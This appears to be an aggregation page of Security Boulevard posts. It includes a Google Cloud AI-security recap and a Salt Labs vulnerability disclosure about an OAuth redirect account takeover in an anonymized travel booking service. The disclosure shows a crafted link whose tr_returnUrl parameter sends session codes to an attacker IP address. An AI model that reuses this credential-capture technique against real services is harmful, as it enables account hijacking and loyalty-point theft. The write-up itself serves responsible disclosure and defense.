Security Boulevard

The post How Compliance Automation Enhances Data Security appeared first on AI Security Automation.

The post How Compliance Automation Enhances Data Security appeared first on Security Boulevard.

[written together with Marina Kaganovich, Executive Trust Lead, Office of the CISO @ Google Cloud; originally posted here]

In 2024, we shared our insights on how to approach generative AI securely by exploring the fundamentals of this innovative technology, delving into key security terms, and examining the essential policies needed for AI governance. We also discussed Google Cloud’s approach to AI security and shared helpful resources like the Secure AI Framework (SAIF).

In addition to publishing blogs and papers, our Cloud Security Podcast by Google episodes have featured experts discussing AI’s impact on security, offering practical implementation advice, and addressing emerging challenges.

Finally, we examined lessons learned from various sectors and provided actionable guidance on securing AI systems alongside best practices for avoiding common AI security pitfalls.

A recap of our key blogs, papers and podcasts on AI security in 2024 follows.

Gen AI Security Fundamentals

Gen AI demystified: Understanding gen AI types and their risks

In today’s rapidly evolving technological landscape, gen AI presents both opportunities and security challenges for business leaders. Navigating this complex and dynamic landscape necessitates a strategic understanding of several key distinctions to inform decisions for optimal security and operational effectiveness: consumer vs. enterprise Gen AI, with the former prioritizing ease of use and the latter emphasizing security; open vs. proprietary models, balancing innovation with controlled access; and cloud vs. on-premise deployments, weighing scalability against data security.

5 gen AI security terms busy business leaders should know

Leaders must be cognizant of 5 key security risks: prompt manipulation, where malicious prompts yield harmful outputs; data leakage, which involves the unintended exposure of sensitive information; model theft, that results in financial and reputational damage; data poisoning, where compromising model outputs are the result of corrupted training data; and hallucinations, a condition where the model generates inaccurate or nonsensical information. Mitigating these risks requires robust security protocols including prompt sanitization, data governance policies, access controls, output filtering, data source vetting, and continuous monitoring, coupled with responsible AI practices such as data curation, model stress-testing, and customer safety tools.

Governance and policy

Gen AI governance: 10 tips to level up your AI program

To effectively operationalize AI at scale, adopt a comprehensive approach encompassing these 10 best practices. These include establishing a cross-functional team of stakeholders, defining clear AI principles, using a robust framework like SAIF, documenting and implementing AI policies, prioritizing use cases, integrating with existing data governance programs, collaborating with compliance and legal teams, establishing escalation pathways, ensuring visibility of AI initiatives, and enabling continuous learning through a dedicated AI training program.

How to craft an Acceptable Use Policy for gen AI

A well-defined Acceptable Use Policy (AUP) for gen AI is crucial for organizations to establish clear guidelines, mitigate risks, and foster responsible AI adoption. Key elements of an AUP include a clear purpose statement, defined scope, assigned accountability, approved tools and data handling guidelines, and practical examples of acceptable and unacceptable AI use.

Google Cloud’s Approach to Trust in Artificial Intelligence

Google Cloud takes a comprehensive approach to secure AI, emphasizing risk management, data governance, privacy, security, and compliance throughout the entire AI lifecycle. With a principled AI development process guided by strong ethical considerations, this approach includes rigorous risk assessments, robust data governance protocols that prioritize customer privacy, and a security-first design mindset that champions transparency, customer control over data, and compliance with industry standards.

EP135 AI and Security: The Good, the Bad, and the Magical

We feature insights from Google Cloud’s CISO, Phil Venables, on the multifaceted impacts of AI on security. Our discussion focuses on AI’s potential as a game-changer in cybersecurity, its applications in threat detection and productivity enhancement, and the unique security concerns it presents. We examine the advantages and disadvantages AI offers to both defenders and attackers, and address the nuances of securing AI systems by emphasizing the concept of shared responsibility in this evolving landscape.

EP185 SAIF-powered Collaboration to Secure AI: CoSAI and Why It Matters to You

This episode introduces the Coalition for Secure AI (CoSAI), featuring Google’s David LaBianca, who highlights CoSAI’s mission to foster collaboration and establish secure AI practices. The discussion explores the importance of partnerships with organizations like Microsoft, OpenAI, and existing AI security initiatives. It also examines CoSAI’s approach to addressing the rapidly evolving AI landscape and emerging threats, outlining anticipated outcomes like a defender’s framework and secure software supply chains for AI.

Building AI securely

Staying on Top of AI Developments

Successfully implementing AI hinges on taking a people-centric approach to AI adoption and emphasizing the importance of workforce preparation through comprehensive AI education and skills development. Demystifying AI concepts, implementing tailored training programs with hands-on experience, and fostering a culture of continuous learning are all key to ensuring employees stay abreast of the latest advancements in this dynamic field. By investing in their workforce’s AI literacy, organizations can effectively leverage AI’s potential while minimizing risks and fostering a smooth transition into an AI-powered future.

7 key questions CISOs need to answer to drive secure, effective AI

Here we’ve taken some of the most common security concerns around AI that we have heard from CISOs around the world and summarized them along with our answers. CISOs should be asking — and answering — these questions related to establishing clear AI guidelines, mitigating emerging threats, safeguarding data security and privacy, and leveraging AI to enhance existing security measures. By proactively addressing these critical areas, organizations can confidently harness AI’s potential while minimizing risks.

To securely build AI on Google Cloud, follow these best practices

Robust security practices are crucial in mitigating the unique risks associated with AI systems. Our research report offers best practices for securing AI workloads on Google Cloud and provides a comprehensive checklist for both security and business leaders by covering key areas like model development, application security, infrastructure, and data management. By adhering to these recommendations, organizations can confidently build and deploy secure AI solutions on Google Cloud while minimizing potential risks.

How SAIF can accelerate secure AI experiments

Accelerate AI adoption through secure and effective AI experiments using the Secure AI Framework (SAIF). Starting with well-defined objectives and targeted use cases, assembling a cross-functional team, utilizing high-quality data, and implementing robust security measures, organizations can support responsible AI experimentation that drives innovation.

SAIF Risk Map

The SAIF Risk Map provides a comprehensive overview of the diverse security risks inherent in AI development spanning data poisoning, model tampering, unauthorized access, and insecure outputs. These risks are introduced at various stages of the AI lifecycle, from data ingestion and model training to deployment and usage. The map emphasizes proactive mitigation strategies, including robust access controls, data sanitization, secure infrastructure, and thorough testing, to address these vulnerabilities and ensure the responsible development and deployment of AI systems.

SAIF Risk Assessment: A new tool to help secure AI systems across industry

The SAIF Risk Assessment is an interactive tool designed to help organizations enhance the security of their AI systems. This questionnaire-based assessment guides users through an evaluation of their AI security practices, identifies potential risks like data poisoning and prompt injection, and offers tailored mitigation strategies, serving as a practical resource for translating the Secure AI Framework (SAIF) into actionable steps and empowering organizations to proactively assess and strengthen their AI security posture.

Securing the AI Software Supply Chain

The evolution of AI brings new security challenges, paralleling those found in traditional software supply chains but with increased complexity. The AI supply chain, encompassing data sourcing, model training, deployment, and maintenance, introduces vulnerabilities at every stage. This paper highlights the urgency of addressing these risks, emphasizing that compromised AI models are already a reality. The paper underscores the adaptability of existing security measures like provenance and SLSA to the AI domain and includes key takeaways such as the importance of provenance and the need for robust security measures throughout the AI development lifecycle.

EP192 Confidential + AI: Can AI Keep a Secret?

We delve into the intersection of confidential computing and AI, featuring Nelly Porter from Google Cloud who discusses real-world applications where confidential AI makes a significant impact, comparing it to on-premises AI solutions and examining which parts of the AI lifecycle are best suited for a confidential environment. The performance, cost, and security implications of confidential AI are also addressed, providing listeners with valuable resources to further explore this emerging technology and its role in safeguarding sensitive data while leveraging the power of AI.

EP173 SAIF in Focus: 5 AI Security Risks and SAIF Mitigations

Honing in on the unique challenges of securing AI systems in cloud environments, we highlight 5 key AI security risks that organizations should address. Featuring Google’s Shan Rao, the discussion explores how the Secure AI Framework (SAIF) can mitigate these risks through common security controls and best practices. We also tackle striking the balance between rapid AI adoption and security, examine future trends in AI security, and provide valuable resources for listeners to further their understanding of this critical domain.

Lessons learned

Be secure, save money: AI-era lessons from financial services CISOs

Here we examine the multifaceted challenges faced by CISOs in the financial sector, particularly in light of the rapid evolution of AI, highlighting the delicate balancing act between embracing AI’s potential and mitigating its inherent risks including evolving threats, securing legacy systems, and managing costs. This blog emphasizes the need for CISOs to adopt a proactive approach by fostering strong governance structures, enhancing threat intelligence capabilities, and building resilient security programs.

Oops! 5 Serious gen AI security mistakes to avoid

Based on Office of the CISO’s discussions with customers, we’ve identified 5 key AI security mistakes to watch for: weak governance guidance, data security, too much access, failure to consider inherited vulnerabilities, and over-indexing on certain risks. To ensure secure and successful gen AI deployments, organizations should prioritize robust AI governance, maintain high-quality data, enforce strict access controls, scrutinize third-party models for vulnerabilities, and apply consistent security measures across all AI implementations, including internal tools. Addressing these key areas will help to mitigate risks, foster secure AI usage, and promote trust while driving positive business outcomes.

EP198 GenAI Security: Unseen Attack Surfaces & AI Pentesting Lessons

In this episode, we consider the unique security challenges posed by gen AI, featuring insights from SplxAI’s Co-Founder and CTO, Ante Gojsalic. The discussion explores the evolving attack surfaces of Gen AI, common security mistakes made by organizations, and the benefits of automating penetration testing for these applications.

Recommendations

From understanding the fundamental concepts and risks to establishing effective governance frameworks and leveraging resources like SAIF, you have access to resources that can help you make informed decisions about your AI initiatives.

Now it’s time to put this knowledge into action!

Related posts:

• Our Security of AI Papers and Blogs Explained
• Cloud Security Podcast by Google on AI

Cross-post: Office of the CISO 2024 Year in Review: AI Trust and Security was originally published in Anton on Security on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post Cross-post: Office of the CISO 2024 Year in Review: AI Trust and Security appeared first on Security Boulevard.

Could There be a Simpler Way to Enhance Cloud-Native Security? Where maintaining top-tier security is as effortless as sipping a chilled lemonade on a beach. Yes, it may seem unlikely, but it is entirely achievable with the systematic and relaxed approach of Non-Human Identity (NHI) and Secrets Security Management. So, what is the key secret […]

The post Relax with Top-tier Cloud-Native Security appeared first on Entro.

The post Relax with Top-tier Cloud-Native Security appeared first on Security Boulevard.

Can NHI Management Be the Key to Unlocking Cybersecurity for Automated Systems? Where data is the new oil, we need to continually revisit and beef up our cybersecurity measures to protect crucial information. The rise in automated systems across various industries has paved the way for Non-Human Identities (NHIs) to gain prominence. This poses an […]

The post Keeping Your Automated Systems Safe and Secure appeared first on Entro.

The post Keeping Your Automated Systems Safe and Secure appeared first on Security Boulevard.

Why is Secrets Management Crucial in Healthcare Systems? Have you ever considered how privileged access to digital systems in healthcare organizations can be both a boon and a bane? As more healthcare institutions migrate to cloud-based services, ensuring the security of sensitive data becomes paramount. Inadequate secrets management could lead to severe consequences, including security […]

The post Improving Secrets Management in Healthcare Systems appeared first on Entro.

The post Improving Secrets Management in Healthcare Systems appeared first on Security Boulevard.

Not all approaches to data de-identification and anonymization are created equal. Many approaches leave your data exposed to the very real risk of re-identification. Here's how that can happen and how to avoid it.

The post Reverse engineering your test data: It’s not as safe as you think it is appeared first on Security Boulevard.

The short answer? Adding data synthesis to your CI/CD pipeline makes your processes better, faster, and more efficient.

The post What is the role of data synthesis in my CI/CD pipeline, anyway? appeared first on Security Boulevard.

David Jemmett, CEO & Founder of CISO Global Unlike Western AI systems governed by privacy laws and ethical considerations, DeepSeek operates under a regime notorious for state-sponsored hacking, surveillance, and cyber espionage. With AI-driven automation at its disposal, China can rapidly scale its cyberattacks, embedding malware, manipulating financial markets, and eroding trust in global AI […]

The post DeepSeek: The Silent AI Takeover That Could Cripple Markets and Fuel China’s Cyberwarfare appeared first on CISO Global.

The post DeepSeek: The Silent AI Takeover That Could Cripple Markets and Fuel China’s Cyberwarfare appeared first on Security Boulevard.

Author/Presenter: Justin Rhynorater Gardner

Our sincere appreciation to DEF CON, and the Authors/Presenters for publishing their erudite DEF CON 32 content. Originating from the conference’s events located at the Las Vegas Convention Center; and via the organizations YouTube channel.

Permalink

The post DEF CON 32 – Top War Stories From A TryHard Bug Bounty Hunter appeared first on Security Boulevard.

As with just about every part of business today, cybersecurity has been awash in the promises of what AI can do for its tools and processes. In fact, cybersecurity vendors have touted the power of algorithmic detection and response for years.

The post AI is a double-edged sword: Why you need new controls to manage risk appeared first on Security Boulevard.

There is an immediate need for organizations to quickly implement or mature their cyber risk practices, and even more so as the reality of a new era of remote work and other changes settles after being driven by the COVID-19 pandemic. The cyber risk landscape and cyber-attack surface have changed across the board due to the pandemic, and attackers, including nation-state groups, are leveraging the situation with both opportunistic and targeted campaigns. 

The post Prioritizing Cybersecurity Findings Exception and Issues in Risk Management appeared first on Security Boulevard.

via the respected Software Engineering expertise of Mikkel Noe-Nygaard and the lauded Software Engineering / Enterprise Agile Coaching work of Luxshan Ratnaravi at Comic Agilé!

Permalink

The post Comic Agilé – Luxshan Ratnaravi, Mikkel Noe-Nygaard – #321 – Use Jira appeared first on Security Boulevard.

The post The Halliburton Cyberattack: A $35M Wake-Up Call appeared first on Votiro.

The post The Halliburton Cyberattack: A $35M Wake-Up Call appeared first on Security Boulevard.

Discover how to effectively manage and optimize AI tokens for better performance and cost efficiency. This guide covers everything from basic concepts to advanced implementations, including context window management, coding assistant development, and practical cost optimization strategies.

The post Complete Guide to AI Tokens: Understanding, Optimization, and Cost Management appeared first on Security Boulevard.

Authors/Presenters: Grey Fox

Our sincere appreciation to DEF CON, and the Authors/Presenters for publishing their erudite DEF CON 32 content. Originating from the conference’s events located at the Las Vegas Convention Center; and via the organizations YouTube channel.

Permalink

The post DEF CON 32 – Travel Better Expedient Digital Defense appeared first on Security Boulevard.

Rule Writer is your go-to AI-powered assistant for tackling the messy, time-consuming world of WAF rule creation and management. It’s not just a tool—it’s like having an extra teammate who never sleeps and always knows exactly what to do.

The Truth About WAF Rules

‍Here’s the thing about WAF rules: most teams barely touch them. It’s not because they don’t care—it’s because they don’t have time. Many teams rely on open-source rule sets, turn on just enough to pass a compliance check, and then… well, forget about them. WAF rules often end up as a "set it and forget it" kind of situation.

When WAF Rules Get Attention, It’s Urgent

‍But when WAF rules do need updating, it’s usually because something’s on fire. Maybe your app is under attack, or a false positive is blocking critical traffic. It could even be a major partner unable to connect to your app. In these moments, speed is everything. You can’t afford to spend weeks crafting the perfect rule. You need a fix, and you need it now.

‍

Enter Rule Writer

‍Rule Writer changes the game. It’s an AI assistant that helps you design, test, and deploy WAF rules faster than ever. Here’s how it works:

1. Start with a Prompt: Simply submit a rule generation prompt to the Impart Platform. No need for deep expertise—just describe the problem.
2. AI-Powered Rule Creation: Rule Writer uses its pre-trained models to create a WAF rule tailored to your needs. It’s like having a seasoned detection engineer on-call.
3. Built-in Testing: The rule isn’t just written—it’s tested right there in the Impart Console. You can validate it against simulated test cases instantly, without having to deploy to production.
4. Quick Deployment: Once you’re satisfied, deploy the rule with a click. No manual implementation, no long delays—just fast, effective action.

With Rule Writer, security teams can finally move at the speed of modern threats without getting bogged down in the details. No more scrambling to update rules during an incident. No more worrying about whether your WAF is doing its job. Rule Writer handles the hard stuff so you can focus on what really matters: keeping your apps secure and your team sane.

Ready to see Rule Writer in action? Give it a try and experience the difference for yourself.

‍

The post write waf rules faster with WAF Rule Writer | Impart Security appeared first on Security Boulevard.

Nisos
Identifying and Preventing Employment Fraud

Remote work is driving an increase in employment fraud complexity and frequency...

The post Identifying and Preventing Employment Fraud appeared first on Nisos by Nisos

The post Identifying and Preventing Employment Fraud appeared first on Security Boulevard.

A global survey of 2,547 IT and cybersecurity practitioners finds 88% work for organizations that experienced one or more ransomware attacks in the past three months to more than 12 months, with well over half (58%) needing to, as a result, shut down operations and 40% reporting a significant loss of revenues. Conducted by the..

The post Survey Surfaces Extent of Financial Damage Caused by Ransomware Scourge appeared first on Security Boulevard.

Account takeover of a third-party service provider may put millions of airline users worldwide at risk.

Summary

Salt Labs has identified an account takeover vulnerability in a popular online top-tier travel service for hotel and car rentals. The service is integrated into dozens of commercial airline online services and allows airline users to add hotel bookings to their airline itinerary.

By exploiting this flaw, attackers can gain unauthorized access to any user’s account within the system, effectively allowing them to impersonate the victim and perform an array of actions on their behalf — including booking hotels and car rentals using the victim's airline loyalty points, canceling or editing booking information, and more.

This vulnerability can be exploited through a malicious link bypassing the travel service's security checks. Attackers may distribute this link via email, text messages, or on attacker-controlled websites to lure victims. Once the link is clicked and following a successful authentication to the official airline service, the attacker gains full access to the user’s account within the travel system.

This vulnerability might have put millions of online airline users at risk. Following our research and coordinated disclosure process, the online travel service has identified, confirmed, and addressed the risks, which are now confirmed to have been mitigated.

Disclaimer

Following the Salt Labs team’s coordinated disclosure, this report will be completely anonymized in order to comply with the request for anonymity by the world-class travel company referenced.  

Motivation

The world of online services is amazing. It wouldn’t be an understatement to say that it alone has changed the lives of millions of people. Today, instead of walking into a grocery store, you can simply purchase everything you need through a mobile application, and in just a short time, it will arrive at your doorstep.

The benefits of online services seem to be never-ending; however, what must be taken into consideration are the Application Programming Interface (APIs) associated with such services. APIs are, in simple terms, the language in which these online services speak. If you look underneath your mobile application hood, you will see that this is exactly what is happening behind the scenes.

While this amazing functionality provides obvious value to online users, the potential does not actually stop there.You see, these services can be trivially used by the end-consumer — but they can also be used by other services.

Think about it for a second: a grocery store offering a delivery service. Did the grocery store get into the delivery business? Well, not necessarily. In fact, in most cases, the answer is no. But if you’re a grocery store, why let that put you down? If they can't offer a delivery service themselves, they can always use a third-party delivery service. All you need to do is connect their online store to an online delivery service and let this service handle all the logistics — they just need to provide the details and boom — they now have an online grocery store that provides delivery service. The nicest thing about it is that their customers are completely unaware of the steps taken to establish the service — for all they know, they are interacting only with your online store, nothing else.

And so, a huge API ecosystem develops right underneath the noses of customers. Services using other services that are again using other services, and so on.

Of course, this is amazing. It provides better services for online customers and a wide range of flexibility options to online businesses in almost any domain. However, it also has a less obvious side effect.

Whenever a service-to-service interaction is taking place, some kind of trust must be shared between both parties. In the case of an online grocery store, the delivery details, phone number, and perhaps even the customer's credit card must be shared with the delivery service provider. From that point on, the grocery store cannot protect this data anymore, as it's out of their hands — and the users now have to rely on the security of a third-party provider, which, as mentioned, they usually are not even aware of.

This, of course, presents a new opportunity for attackers. From their perspective, the attack surface available to them just multiplied, providing more opportunities to find security issues.

Imagine that the online grocery store does an amazing job at protecting its online customers, making it very difficult for an attacker to break into the system and steal private customer data. However, now, the attacker can actually choose to attack the delivery service rather than the store itself, as it is a different company; there is a chance that their security controls are not as strict as that of the online store, and if successful, the goal is still achieved as the delivery service now holds all the necessary private information.

Such an attack is called an “API Supply Chain Attack,” in which an attacker chooses to attack a weaker link in the service’s API ecosystem.

While security professionals have long-known supply-chain attacks, they are far less known to the general public, and we have seen very few actual cases of API supply-chain attacks or technical vulnerabilities published.

It’s also important to mention that many governance security controls and policies, such as GDPR, HIPPA, and many others, have been built and implemented throughout the years to address this risk. While they’ve definitely improved the situation and reduced the risk, the problem doesn’t just go away.

This is why we decided to tackle this issue: to attempt to find a real-world API supply chain attack that could impact millions of online users. We hope this will shed some more light on this super important topic and raise more awareness of it.  

Choosing a Target

So, we set out on a mission to find a real-world API supply chain attack, but where should we start looking for it?

We started looking for travel-related online services that provide a third-party integration. Our goal was to find a popular service that shares considerable trust and valuable information from the calling service.

After a lot of digging, we found a service that could have been what we were looking for.

As mentioned before, we chose to anonymize the service in this article and will henceforth address it as “Acme Travel.” It provides online hotel and car rental booking solutions.

After some more searching, we discovered that this service is indeed a popular vendor for many commercial airline services, as well as other retail services. Moreover, integration into this service allows users to book hotels and car rentals using their airline loyalty points, which means this information is trusted and shared between the airline and the Acme Travel service.

Amazing, this is just what we were looking for. Obviously, breaking into an airline in an attempt to steal loyalty points would be a very hard task for any attacker, but perhaps this new service, or the connection point between these services, might change this equation.

Equipped with motivation and a potential target, we now had everything we needed to start our research. All we needed to do was find a security vulnerability. Let the games begin.

The Plan

From a technical perspective, the best way to achieve our goal was to find an account-takeover scenario on Acme-Travel services. This would allow us to log in directly to the service as any user and act on their behalf — including, of course, issuing hotel and car rental bookings using the user's airline loyalty points. To achieve that, we first had to better understand the airline service, the Acme-Travel service, and their connection.

Normal Process

Let’s begin by describing the typical login process on an airline website that chose to use the Acme travel service. We have obviously looked into many online airline services. However, for the sake of this research, we will mention a fabricated airline that follows the exact same technical flow as Salt Airlines.

At some point, after issuing the initial airline booking, users of Salt Airlines’ main application — www.saltairlines.sec — may choose to add an additional hotel or car-rental booking to their trip. If they choose to do this, they will be redirected to the Acme Travel service integration acme.saltairlines.sec. Note that from a user's perspective, this is all happening transparently, it's not trivial to even notice that they are now in a third-party application and no longer on the original Salt Airlines site, as the web design is customized, and the user experience is completely aligned with the original airline service.

Once the user is redirected to the Acme-Travel integrated site, they can initiate a login using their airline credentials. At this point, the Acme-Travel backend will generate a link and redirect the user back to the main airline website to perform authentication via an authentication technology called OAuth. Once a successful login takes place, this process retrieves the user’s account information from the airline site, including his/her personal data and loyalty point status.

After completing these steps, the user is redirected back into acme.saltairlines.sec, where they can now access and use their airline loyalty points to book hotels and car rentals at their leisure.

Here is a technical breakdown of the requests that are generated as part of this process:

1. When the user clicks the login button, their browser follows this link:
   ‍
   https://acme.saltairlines.sec/start?tr_returnUrl=https%3A%2F%2Facme.saltairlines.sec%2F&language=en&tr_backend_session=example

1. The user is then automatically redirected to the official Salt Airlines login page (www.saltairlines.sec), initiating an OAuth flow:
   ‍
   https://www.saltairlines.sec/authorization.oauth2?response_type=code&client_id=acmemiles&state=35b217d3-df3f-4b64-b0ab-1a4382f450b4&redirect_uri=https://acme.saltairlines.sec/

1. After successful authentication, the user is redirected to the following link (tr_returnUrl parameter value), which includes a secret code and ID as query parameters:
   ‍
   https://acme.saltairlines.sec/?tr_code=920b677d-00eb-4f68-a58e-5b265ada522d&tr_id=d14b207037b25f497bfdb9139e47312bc06e4e4a&tr_state=

1. Finally, acme.saltairlines.sec creates a session cookie (JSESSIONID) by sending a POST request with the code and ID to this endpoint:
   ‍
   https://acme.saltairlines.sec/SessionEndpoint

Malicious Process

Now that we clearly understand how the services work and interact with each other, it's time to try to find security issues within the process.

By closely examining the authentication flow, we realized that the tr_returnUrl parameter found in the initial login request actually determines where the tr_code and tr_id parameters will be sent to after a successful authentication is complete.

As a quick reminder, the tr_code and tr_id parameters are equivalent to the user credentials since an attacker who holds them can log in to the Acme Travel service without any further need for authentication.

https://acme.saltairlines.sec/start?tr_returnUrl=https%3A%2F%2Facme.saltairlines.sec%2F&language=en&tr_backend_session=example

In the normal flow, the tr_code and tr_id parameters are sent to the Acme-Travel service, however by manipulating the tr_returnUrl parameter, we attempted to redirect the tr_code and tr_id to a server under our control. If successful this would allow us to capture these credentials, enabling unauthorized access and account hijacking.

And it seems it worked! When sending a request with a manipulated tr_returnUrl parameter that points to a server we control, we can see that, indeed, a request from the client is received, which contains both the tr_code and tr_id parameters.

This basically allows us to take over an airline user's account once he successfully authenticates to the airline website.

In order to conduct our attack, the following steps are taken:

1. In step 1 of the normal login flow, observe the tr_returnUrl parameter. This value contains the domain that will receive the code and id values after a successful login.

   In our use case, the original tr_returnUrl is:

   tr_returnUrl=https%3A%2F%2Facme.saltairlines.sec%2F&

1. By manipulating this value, an attacker can replace it with a URL under their control, such as:

   tr_returnUrl=http://142.93.164.25/evil

1. The attacker then shares this modified link with the victim using any available communication method, such as email, SMS messages, posts on an online forum, etc.
2. A victim who encounters this link will have very few clues as to the presence of the malicious code, as the link’s domain is the official airline domain, and the request seems completely legitimate.
3. Since the backend server does not validate the tr_returnUrl domain, it accepts any value as a valid redirect. Consequently, it generates the corresponding Salt Airlines OAuth link:

6. After the victim successfully authenticates to the official airline page, the code and id values are sent to the attacker-controlled URL. In this case, the request would look like:

https://acme.saltairlines.sec/start?tr_returnUrl=http://142.93.164.25/evil&language=en&tr_backend_session=c077f47e-c60e-45ec-96d7-e512812fa638

7 . The attacker can then use these credentials to obtain a valid session token by making a request to the following endpoint:

https://acme.saltairlines.sec/SessionEndpoint

8. With this session token, the attacker can log into the system as the victim and perform actions on their behalf, including, of course, booking hotels and car rentals using nothing but the victim’s airline loyalty points.

9. Attacker goes on a free vacation :)

Notes:

If the victim is already logged in to www.saltairlines.sec, they will be redirected to the attacker’s server with the code and id in a single click, without requiring an additional login.

Since the manipulated link uses a legitimate customer domain (with manipulation occurring only at the parameter level rather than the domain level), this makes the attack difficult to detect through standard domain inspection or blocklist/allowlist methods.

Conclusion

This discovered vulnerability enables attackers to take over victim accounts with a single click. While the takeover occurs within the Acme-integrated service, it provides attackers full access to the user’s personally identifiable information (PII) from the main Salt Airlines account, including all mileage and rewards data. Beyond mere data exposure, attackers can perform actions on behalf of the user, such as creating orders or modifying account details. This critical risk highlights the vulnerabilities in third-party integrations and the importance of stringent security protocols to protect users from unauthorized account access and manipulation.

What can I do?

As always, it’s important for us to provide readers who reached this point in our publication with some recommendations as to what they can do in order to prevent being attacked with this and similar API supply chain attack techniques.

These recommendations, however, vary depending on what role you play in this API ecosystem.

Service Users

As a user of online services, it is always advisable to use caution when receiving links from untrusted sources, even if the links may appear utterly legitimate at first glance, and even if they lead to legitimate and trusted web sites.

Service Consumers

If your service is consuming or using a third-party service, you should pay special attention to the integration point between these services as well as to the trust relationship between the services and verify that everything meets your desired security standards and that the information shared between the services is mandatory.

It is also advisable to perform extra security checks, as well as penetration testing methodologies depending on the type and sensitivity of the relationship between the services.  

Service Producers

As a service producer, it is super important to make sure your service and its integration points are well secure. Special attention should be put into the design and implementation steps to ensure security standards are met and correctly implemented. Additionally, it is recommended to consider using a third-party vendor that will be able to automatically identify any existing posture gaps, and anomalous traffic as it occurs to support a more robust layered defense approach.

The post API Supply Chain Attacks — The Sky’s the Limit appeared first on Security Boulevard.

Ransomware attacks surged to a record high in December 2024, with 574 incidents reported, according to an NCC Group report. FunkSec, a newly identified group combining hacktivism and cybercrime, accounted for over 100 attacks (18% of the total), making it the most active group that month, ahead of Cl0p, Akira and RansomHub. The industrial sector..

The post Ransomware Threats, Led by FunkSec, Rise to New Heights appeared first on Security Boulevard.